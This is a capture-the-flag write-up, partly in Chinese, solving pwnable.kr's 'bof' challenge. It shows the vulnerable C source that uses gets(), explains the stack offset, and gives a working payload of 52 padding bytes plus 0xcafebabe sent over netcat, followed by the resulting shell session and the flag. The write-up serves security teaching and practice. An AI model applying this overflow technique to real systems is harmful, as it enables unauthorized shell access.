Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

題目有給C的原始碼:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

唯一可控的只有輸入的overflowme,得想辦利用buffer overflow蓋掉key的值使得第八行的判斷能夠成立。

丟進IDA Pro看func的部分:
ida

根據組合語言,我畫出了這張stack圖幫助我理解:
stack

雖然overflowme只配置了32 bytes的空間,但使用了gets()使得輸入的長度沒有限制,-0x2C0x08之間總共有52 bytes的空間,只要把這部分塞滿就可以進一步將key的位址0x08覆蓋成我們希望的值,payload建構如下(要注意是little endian):

1
2
3
4
5
6
7
8
9
10
$ (python -c 'print "a" * 52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)